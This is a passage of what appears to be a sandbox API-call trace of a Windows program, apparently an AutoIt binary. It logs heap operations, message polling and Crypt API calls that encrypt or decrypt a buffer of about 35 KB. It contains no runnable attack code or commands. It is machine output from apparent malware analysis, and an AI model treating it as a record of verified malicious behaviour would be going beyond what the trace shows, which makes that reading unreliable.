RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.320] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.320] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.320] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0198.321] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0198.321] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0198.321] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.321] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.322] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0198.322] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0198.322] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.323] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0198.323] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0198.324] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.324] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0198.325] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0198.325] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0198.325] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0198.325] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2668, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2668*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.326] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0198.326] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0198.326] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.326] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.326] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.327] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.327] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x8c35, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x8c40) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.327] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.327] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.328] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.328] CharLowerBuffW (in: lpsz="byte[35905]", cchLength=0xb | out: lpsz="byte[35905]") returned 0xb [0198.328] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0198.329] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0198.329] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0198.329] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.329] CryptEncrypt (in: hKey=0x90af18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc044d8*, pdwDataLen=0x87e820*=0x8c35, dwBufLen=0x8c40 | out: pbData=0xc044d8*, pdwDataLen=0x87e820*=0x8c40) returned 1 [0198.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.330] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0198.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0198.332] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 